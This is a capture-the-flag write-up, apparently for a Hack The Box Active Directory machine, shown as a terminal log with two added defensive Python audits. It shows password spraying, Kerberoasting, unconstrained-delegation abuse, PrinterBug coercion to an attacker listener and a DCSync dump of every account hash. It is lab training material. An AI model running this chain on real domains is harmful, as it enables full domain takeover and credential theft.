Redelegate

1. User

1.1. Recon

1.1.1. PortScan

┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# nmap 10.129.234.69 -p 88,135,139,389,445,464,593,636,3268,3389,5985,9389 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-14 09:38 EDT
Nmap scan report for DC1.delegate.vl (10.129.234.69)
Host is up (0.059s latency).

PORT     STATE SERVICE       VERSION
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-10-14 13:38:41Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: DELEGATE
|   NetBIOS_Domain_Name: DELEGATE
|   NetBIOS_Computer_Name: DC1
|   DNS_Domain_Name: delegate.vl
|   DNS_Computer_Name: DC1.delegate.vl
|   DNS_Tree_Name: delegate.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-10-14T13:38:46+00:00
|_ssl-date: 2025-10-14T13:39:25+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.delegate.vl
| Not valid before: 2025-10-13T13:28:14
|_Not valid after:  2026-04-14T13:28:14
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-10-14T13:38:46
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.54 seconds
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# nxc smb dc1.delegate.vl -u 'guset' -p '' --rid-brute
SMB         10.129.234.69   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.69   445    DC1              [+] delegate.vl\guset: (Guest)
SMB         10.129.234.69   445    DC1              498: DELEGATE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.234.69   445    DC1              500: DELEGATE\Administrator (SidTypeUser)
SMB         10.129.234.69   445    DC1              501: DELEGATE\Guest (SidTypeUser)
SMB         10.129.234.69   445    DC1              502: DELEGATE\krbtgt (SidTypeUser)
SMB         10.129.234.69   445    DC1              512: DELEGATE\Domain Admins (SidTypeGroup)
SMB         10.129.234.69   445    DC1              513: DELEGATE\Domain Users (SidTypeGroup)
SMB         10.129.234.69   445    DC1              514: DELEGATE\Domain Guests (SidTypeGroup)
SMB         10.129.234.69   445    DC1              515: DELEGATE\Domain Computers (SidTypeGroup)
SMB         10.129.234.69   445    DC1              516: DELEGATE\Domain Controllers (SidTypeGroup)
SMB         10.129.234.69   445    DC1              517: DELEGATE\Cert Publishers (SidTypeAlias)
SMB         10.129.234.69   445    DC1              518: DELEGATE\Schema Admins (SidTypeGroup)
SMB         10.129.234.69   445    DC1              519: DELEGATE\Enterprise Admins (SidTypeGroup)
SMB         10.129.234.69   445    DC1              520: DELEGATE\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.234.69   445    DC1              521: DELEGATE\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.234.69   445    DC1              522: DELEGATE\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.234.69   445    DC1              525: DELEGATE\Protected Users (SidTypeGroup)
SMB         10.129.234.69   445    DC1              526: DELEGATE\Key Admins (SidTypeGroup)
SMB         10.129.234.69   445    DC1              527: DELEGATE\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.234.69   445    DC1              553: DELEGATE\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.234.69   445    DC1              571: DELEGATE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.234.69   445    DC1              572: DELEGATE\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.234.69   445    DC1              1000: DELEGATE\DC1$ (SidTypeUser)
SMB         10.129.234.69   445    DC1              1101: DELEGATE\DnsAdmins (SidTypeAlias)
SMB         10.129.234.69   445    DC1              1102: DELEGATE\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.234.69   445    DC1              1104: DELEGATE\A.Briggs (SidTypeUser)
SMB         10.129.234.69   445    DC1              1105: DELEGATE\b.Brown (SidTypeUser)
SMB         10.129.234.69   445    DC1              1106: DELEGATE\R.Cooper (SidTypeUser)
SMB         10.129.234.69   445    DC1              1107: DELEGATE\J.Roberts (SidTypeUser)
SMB         10.129.234.69   445    DC1              1108: DELEGATE\N.Thompson (SidTypeUser)
SMB         10.129.234.69   445    DC1              1121: DELEGATE\delegation admins (SidTypeGroup)

1.1.3. SMB

┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# nxc smb dc1.delegate.vl -u 'guset' -p '' --shares
SMB         10.129.234.69   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.69   445    DC1              [+] delegate.vl\guset: (Guest)
SMB         10.129.234.69   445    DC1              [*] Enumerated shares
SMB         10.129.234.69   445    DC1              Share           Permissions     Remark
SMB         10.129.234.69   445    DC1              -----           -----------     ------
SMB         10.129.234.69   445    DC1              ADMIN$                          Remote Admin
SMB         10.129.234.69   445    DC1              C$                              Default share
SMB         10.129.234.69   445    DC1              IPC$            READ            Remote IPC
SMB         10.129.234.69   445    DC1              NETLOGON        READ            Logon server share
SMB         10.129.234.69   445    DC1              SYSVOL          READ            Logon server share
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# impacket-smbclient guset@dc1.delegate.vl   -dc-ip 10.129.234.69 -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# ls
[-] No share selected
# dir
*** Unknown syntax: dir
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
# use netlogon
# ls
drw-rw-rw-          0  Sun Oct  1 05:08:32 2023 .
drw-rw-rw-          0  Sun Oct  1 05:08:32 2023 ..
-rw-rw-rw-        159  Sun Oct  1 05:08:32 2023 users.bat
# get users.bat
# exit

┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# ls -l
total 20
-rw-r--r-- 1 root root 3354 Oct 14 09:31 competitive_C1trus33.ovpn
-rw-r--r-- 1 root root   50 Oct 14 09:37 hosts
-rw-r--r-- 1 root root   14 Oct 14 09:31 notes
-rw-r--r-- 1 root root  679 Oct 14 09:36 ports
-rw-r--r-- 1 root root  159 Oct 14 09:50 users.bat

┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# cat users.bat
rem @echo off
net use * /delete /y
net use v: \\dc1\development

if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
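As an added defensive check (not part of the original writeup): a small Python scanner that finds `net use` lines in a NETLOGON logon script that carry an inline `/user:` password and reports them with the secret masked. The sample input is the users.bat recovered above, embedded as a constructed string; the parser handles the password appearing either before or after `/user:`.

```python
import re
from typing import Dict, List, Optional

# Constructed sample: the users.bat logon script recovered from the NETLOGON share above.
SAMPLE_SCRIPT = r"""rem @echo off
net use * /delete /y
net use v: \\dc1\development

if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
"""

DRIVE_RE = re.compile(r"^(?:[a-z]:|\*)$", re.IGNORECASE)


def parse_net_use(command: str) -> Optional[Dict[str, Optional[str]]]:
    """Return share/user/password for a 'net use' command, or None if the line is not one.

    'net use' may be preceded by other tokens (here an 'if %USERNAME%==...' guard), and
    the password is a bare positional argument that may appear before or after /user:.
    """
    tokens = command.split()
    for i in range(len(tokens) - 1):
        if tokens[i].lower() == "net" and tokens[i + 1].lower() == "use":
            args = tokens[i + 2:]
            break
    else:
        return None
    user = next((t[len("/user:"):] for t in args if t.lower().startswith("/user:")), None)
    if user is None:
        return None  # mapped with the caller's own credentials: nothing embedded
    share = next((t for t in args if t.startswith("\\\\")), None)
    # Whatever remains once switches, the drive letter and the UNC path are removed is the password.
    leftovers = [t for t in args if not t.startswith("/") and t != share and not DRIVE_RE.match(t)]
    return {"share": share, "user": user, "password": leftovers[0] if leftovers else None}


def mask(secret: str) -> str:
    """Keep only the first character so the report itself does not re-leak the credential."""
    return secret[0] + "*" * (len(secret) - 1)


def find_embedded_credentials(script: str) -> List[Dict[str, object]]:
    """Scan a batch logon script and report every net use line that carries an inline password."""
    findings: List[Dict[str, object]] = []
    for lineno, raw in enumerate(script.splitlines(), start=1):
        line = raw.strip()
        if not line or line.lower().startswith(("rem ", "::")):
            continue  # comments do not execute
        parsed = parse_net_use(line)
        if parsed and parsed["password"]:
            findings.append({
                "line": lineno,
                "share": parsed["share"],
                "user": parsed["user"],
                "password_masked": mask(parsed["password"]),
                "password_length": len(parsed["password"]),
            })
    return findings


if __name__ == "__main__":
    for f in find_embedded_credentials(SAMPLE_SCRIPT):
        print(f"line {f['line']}: {f['share']} as {f['user']} with inline password {f['password_masked']}")
```

Run the same function over every script in SYSVOL and NETLOGON to catch this class of leak before a guest-readable share exposes it.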

1.1.4. Password spraying

┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# nxc smb dc1.delegate.vl -u users.txt -p 'P4ssw0rd1#123'
SMB         10.129.234.69   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.69   445    DC1              [-] delegate.vl\Administrator:P4ssw0rd1#123 STATUS_LOGON_FAILURE
SMB         10.129.234.69   445    DC1              [-] delegate.vl\Guest:P4ssw0rd1#123 STATUS_LOGON_FAILURE
SMB         10.129.234.69   445    DC1              [-] delegate.vl\krbtgt:P4ssw0rd1#123 STATUS_LOGON_FAILURE
SMB         10.129.234.69   445    DC1              [-] delegate.vl\DC1$:P4ssw0rd1#123 STATUS_LOGON_FAILURE
SMB         10.129.234.69   445    DC1              [+] delegate.vl\A.Briggs:P4ssw0rd1#123

┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# targetedKerberoast.py -v -d delegate.vl -u A.Briggs -p 'P4ssw0rd1#123'  --dc-host 10.129.234.69
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (N.Thompson)
[+] Printing hash for (N.Thompson)
[VERBOSE] SPN removed successfully for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$4b06c0cbfa7854207bc98c76a5c40ba3$4b8d17b4fbbc196016f1c5f2decad916fc166e97b86c94439ae0eeb25fcdb02ade05c128b41ef416b06a0dab1d16d09b5015fb2f83f93b0f62642b8fa95ef7caeb90673c7a1ed63b7c2e5d36357a3de2429055bbe2eced4e3bd40a3e7c291b0beaec0d3ab24fbd06aee76a118e7cb0453e913a2b499081b77180466986b2e70fb7a7525fa21b308424db9731db846474858dcbcba94373d5cc29648d346da3ce53cd9ec4fe08682d886f58814dc073e8c01ba646e4db458a36cfdd67bfa220fbbd4a918b851faa38aa9c33e92b349030b8dcdbfe28242d79225cb42b04ea1597654a0fb0d1a26e329eeb4cadf68126877579b47b5fe61af391ad695429d9d50e1605cad940723023ecaa27f08c1cb2934111bf24826d7c67434883f55ad5e745aa9136746d24484ad2638bf369acdcef0b7a99fe0c61f537b2b8da92530f8b87440db58f8ead2a1842193b07b34756252598ce6cdc4937526f1e4985f8226c7465e474b31da9e4b1d4641e7171447e2419fb304118c9767ff3d28a053c5d669890724b25921fef150b0c27660c9ea719d94f899a5160b242f62d0b9c1e2288396bd673cc024628b9741675d0189becd3a82e155622c2d4f3cd3ddf70cbf571e90812eaa9e9d01bd4fe635f8cc9b358dfacec1f311eede4d135f19a82b14ad4900c1ff1e6dc9686539f9df18dade0ca937dc8ef0842f475e330299a030b1a29b3f975f8073e3168cf3c3c10c56aca59f0c56745e8f9e476da13c43d3ccf8fababca4194af19667b4702e2ce737faeea77c487cd224bef1905e94c308d8b4ad4b316b48f29b0d04282576020f71971014f7016dbd99a8a8368754294caee1c52ccab83a23173c7def40f5a28e5f9e1d33e358ec52a87a77e18e79f2f3727c3ac94802f8025ec43440bb9345d01bececd4a6190534d198089a00b6623740aa9f4fc6df65ee98f4788ae839943e56da1c41dc246a368db045ffd8aa7da16e61b201fc0db45c229a9be03710790bea0ae2a5927f7e51497b222b093bd25d811c5fb5c000027d5fcda54b9414b5376be5b980ece2168fafe4bcaf393c69ab7aca0b19f4f5c7d02b8d74d2678931f6dee19f177b491bce70916f51a80ba76e4dfefa478ef175d8ecadd3e0f52bc6a79acbb2134320f7d8c8a9e3c7046b8925d08836f9f9bfd390a61b0d97574e18b92edf0eaa81f9c4a0de2747127bce5a915457a1eae4d829fddb9a864f337ad77e11073356b34ed7553e3f50fc1974099195340e53fef4be8ae5147e7e3279c432314617ddeadb306664c5dd62f60939da64b62af39aea93edb80dea964c60dfb6ba4c74f53510216dc54fe1f19ed1
700565f63ff837125c1afc94f988f82f0fbe71772a85be8629d15fe042779ac68fa4ef1eaa9b0eb372415b3293c12f266c7ca75cbab3bc34bd2f8e727ec200628b30e4af984ca30729702:KALEB_2341

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.T...729702
Time.Started.....: Tue Oct 14 22:12:24 2025 (1 sec)
Time.Estimated...: Tue Oct 14 22:12:25 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 15976.7 kH/s (6.18ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11010048/14344388 (76.76%)
Rejected.........: 0/11010048 (0.00%)
Restore.Point....: 10223616/14344388 (71.27%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: alisonpanda -> Joywang328
Hardware.Mon.#01.: Temp: 50c Util: 27% Core:1890MHz Mem:8001MHz Bus:8

1.3. winrm

┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# evil-winrm -i delegate.vl -u N.Thompson -p KALEB_2341

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                                                    State
============================= ============================================================== =======
SeMachineAccountPrivilege     Add workstations to domain                                     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                                       Enabled
SeEnableDelegationPrivilege   Enable computer and user accounts to be trusted for delegation Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set                                 Enabled

2. System

*Evil-WinRM* PS C:\Users\N.Thompson\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                                                    State
============================= ============================================================== =======
SeMachineAccountPrivilege     Add workstations to domain                                     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                                       Enabled
>>>> SeEnableDelegationPrivilege   Enable computer and user accounts to be trusted for delegation Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set                                 Enabled

The account holds SeEnableDelegationPrivilege, which can be used to attack via delegation.

┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# nxc ldap delegate.vl -u N.Thompson -p KALEB_2341 -M maq
LDAP        10.129.234.69   389    DC1              [*] Windows Server 2022 Build 20348 (name:DC1) (domain:delegate.vl) (signing:None) (channel binding:No TLS cert)
LDAP        10.129.234.69   389    DC1              [+] delegate.vl\N.Thompson:KALEB_2341
MAQ         10.129.234.69   389    DC1              [*] Getting the MachineAccountQuota
>>>> MAQ         10.129.234.69   389    DC1              MachineAccountQuota: 10

Create a new computer account with impacket-addcomputer

┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# impacket-addcomputer 'delegate.vl/N.Thompson:KALEB_2341'  -computer-name hack -computer-pass Admin123  -dc-ip 10.129.234.69
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Successfully added machine account hack$ with password Admin123.

Add a DNS record with dnstool.py

┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# dnstool.py -u 'delegate.vl\hack$' -p 'Admin123' --action add -r hack.delegate.vl -d 10.10.14.69 --type A -dns-ip 10.129.234.69 dc1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully


┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# dnstool.py -u 'delegate.vl\hack$' -p Admin123 -r hack.delegate.vl -d 10.10.14.69 --action add DC1.delegate.vl -dns-ip 10.129.234.69 --allow-multiple
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding extra record
[+] LDAP operation completed successfully

Check it with nslookup

┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# nslookup hack.delegate.vl dc1.delegate.vl
Server:         dc1.delegate.vl
Address:        10.129.234.69#53

>>>> Name:   hack.delegate.vl
>>>> Address: 10.10.14.69

Then use addspn.py to assign an SPN to the machine account; otherwise the later exploitation step fails.

┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'ldap/hack.delegate.vl' -t 'hack$' -dc-ip 10.129.234.69 dc1.delegate.vl --additional
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully

Then use bloodyAD to configure unconstrained delegation

┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# bloodyAD --host dc1.delegate.vl -d delegate.vl -u N.Thompson -p KALEB_2341  add uac 'hack$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to hack$'s userAccountControl

Check whether the configuration took effect

*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Get-ADComputer hack -Properties TrustedForDelegation | Select-Object Name, TrustedForDelegation

Name TrustedForDelegation
---- --------------------
hack                 True

It can also be viewed with bloodyAD

┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# bloodyAD --host dc1.delegate.vl -d delegate.vl -u N.Thompson -p KALEB_2341  get object  'hack$' |grep userAccountControl
>>>> userAccountControl: WORKSTATION_TRUST_ACCOUNT; TRUSTED_FOR_DELEGATION
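As an added defensive audit (not code from the writeup): decoding userAccountControl the way bloodyAD prints it and flagging every non-DC account that carries TRUSTED_FOR_DELEGATION, with extra weight when mS-DS-CreatorSID shows the account was created through MachineAccountQuota and when it holds SPNs. The account records and the SID are constructed placeholders standing in for an LDAP query result.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# userAccountControl bits (MS-ADTS 2.2.16) that matter for a delegation review.
UAC_FLAGS: Dict[int, str] = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
TRUSTED_FOR_DELEGATION = 0x80000
SERVER_TRUST_ACCOUNT = 0x2000


@dataclass
class Account:
    """The few attributes an LDAP query would return per account (filled in by hand here)."""
    sam: str
    uac: int
    creator_sid: Optional[str] = None  # mS-DS-CreatorSID: set only when a non-admin used MachineAccountQuota
    spns: List[str] = field(default_factory=list)  # servicePrincipalName


def decode_uac(uac: int) -> List[str]:
    """Render the bitmask as flag names, in the style of the bloodyAD output above."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if uac & bit]


def audit_unconstrained(accounts: List[Account]) -> List[Dict[str, object]]:
    """Flag every non-DC account trusted for unconstrained delegation, with the reasons it is risky."""
    findings: List[Dict[str, object]] = []
    for acct in accounts:
        if not acct.uac & TRUSTED_FOR_DELEGATION:
            continue
        if acct.uac & SERVER_TRUST_ACCOUNT:
            continue  # domain controllers carry this bit by design
        reasons = ["TRUSTED_FOR_DELEGATION on a non-DC account"]
        if acct.creator_sid:
            reasons.append(f"created through MachineAccountQuota by {acct.creator_sid}")
        if acct.spns:
            reasons.append("has SPNs, so Kerberos clients authenticating to it forward their TGT: "
                           + ", ".join(acct.spns))
        findings.append({"sam": acct.sam, "flags": decode_uac(acct.uac), "reasons": reasons})
    return findings


# Constructed sample reflecting the lab after the steps above; the creator SID is a placeholder.
SAMPLE_ACCOUNTS = [
    Account("DC1$", SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION),
    Account("WS01$", 0x1000),
    Account("hack$", 0x1000 | TRUSTED_FOR_DELEGATION,
            creator_sid="S-1-5-21-<domain>-1108", spns=["ldap/hack.delegate.vl"]),
]

if __name__ == "__main__":
    for f in audit_unconstrained(SAMPLE_ACCOUNTS):
        print(f"{f['sam']}: {'; '.join(f['flags'])}")
        for reason in f["reasons"]:
            print(f"  - {reason}")
```

Setting MachineAccountQuota to 0 and restricting SeEnableDelegationPrivilege to Domain Admins removes both preconditions this audit looks for.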

Then perform the NTLM relay.
First compute the hash of the machine account we created.

┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# python -c "password = 'Admin123'; import hashlib; print(hashlib.new('md4', password.encode('utf-16le')).hexdigest())"
e45a314c664d40a227f9540121d1a29d

Start the listener

┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# krbrelayx.py -hashes :e45a314c664d40a227f9540121d1a29d
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections

Coercer, or the module integrated into nxc, can be used here to detect and exploit the coercion vectors.

┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# nxc smb dc1.delegate.vl -u 'hack$' -p Admin123 -M coerce_plus
SMB         10.129.234.69   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.69   445    DC1              [+] delegate.vl\hack$:Admin123
COERCE_PLUS 10.129.234.69   445    DC1              VULNERABLE, DFSCoerce
COERCE_PLUS 10.129.234.69   445    DC1              VULNERABLE, PetitPotam
COERCE_PLUS 10.129.234.69   445    DC1              VULNERABLE, PrinterBug
COERCE_PLUS 10.129.234.69   445    DC1              VULNERABLE, PrinterBug
COERCE_PLUS 10.129.234.69   445    DC1              VULNERABLE, MSEven

Several forced-authentication vulnerabilities are present; pick any one of them.

┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# nxc smb dc1.delegate.vl -u 'hack$' -p Admin123 -M coerce_plus -o L=10.10.14.69 M=PrinterBug
SMB         10.129.234.69   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.69   445    DC1              [+] delegate.vl\hack$:Admin123
COERCE_PLUS 10.129.234.69   445    DC1              VULNERABLE, PrinterBug
COERCE_PLUS 10.129.234.69   445    DC1              Exploit Success, spoolss\RpcRemoteFindFirstPrinterChangeNotificationEx

Repeated attempts here did not receive a TGT.

Switching to the companion tool printerbug.py, the relay succeeded.

┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# printerbug.py -hashes :e45a314c664d40a227f9540121d1a29d  'delegate.vl/hack$@dc1.delegate.vl' hack.delegate.vl
[*] Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Attempting to trigger authentication via rprn RPC at dc1.delegate.vl
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# krbrelayx.py -hashes :e45a314c664d40a227f9540121d1a29d
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.234.69
>>>> [*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
>>>> [*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.129.234.69
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.234.69
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.234.69
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.129.234.69
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.234.69
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'

coercer coerce -l 10.10.14.69 -t 10.129.234.69 -u 'hack$' -p 'Admin123' -d delegate.vl

2.2. DCSync

┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# export KRB5CCNAME=DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache

┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# nxc smb delegate.vl -k --use-kcache --ntds
SMB         delegate.vl     445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         delegate.vl     445    DC1              [+] DELEGATE.VL\DC1$ from ccache
SMB         delegate.vl     445    DC1              [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB         delegate.vl     445    DC1              [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         delegate.vl     445    DC1              Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::
SMB         delegate.vl     445    DC1              Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         delegate.vl     445    DC1              krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
SMB         delegate.vl     445    DC1              A.Briggs:1104:aad3b435b51404eeaad3b435b51404ee:8e5a0462f96bc85faf20378e243bc4a3:::
SMB         delegate.vl     445    DC1              b.Brown:1105:aad3b435b51404eeaad3b435b51404ee:deba71222554122c3634496a0af085a6:::
SMB         delegate.vl     445    DC1              R.Cooper:1106:aad3b435b51404eeaad3b435b51404ee:17d5f7ab7fc61d80d1b9d156f815add1:::
SMB         delegate.vl     445    DC1              J.Roberts:1107:aad3b435b51404eeaad3b435b51404ee:4ff255c7ff10d86b5b34b47adc62114f:::
SMB         delegate.vl     445    DC1              N.Thompson:1108:aad3b435b51404eeaad3b435b51404ee:4b514595c7ad3e2f7bb70e7e61ec1afe:::
SMB         delegate.vl     445    DC1              DC1$:1000:aad3b435b51404eeaad3b435b51404ee:f7caf5a3e44bac110b9551edd1ddfa3c:::
SMB         delegate.vl     445    DC1              hack$:4601:aad3b435b51404eeaad3b435b51404ee:e45a314c664d40a227f9540121d1a29d:::
SMB         delegate.vl     445    DC1              [+] Dumped 10 NTDS hashes to /root/.nxc/logs/ntds/delegate.vl_None_2025-10-14_115731.ntds of which 8 were added to the database
SMB         delegate.vl     445    DC1              [*] To extract only enabled accounts from the output file, run the following command:
SMB         delegate.vl     445    DC1              [*] cat /root/.nxc/logs/ntds/delegate.vl_None_2025-10-14_115731.ntds | grep -iv disabled | cut -d ':' -f1
SMB         delegate.vl     445    DC1              [*] grep -iv disabled /root/.nxc/logs/ntds/delegate.vl_None_2025-10-14_115731.ntds | cut -d ':' -f1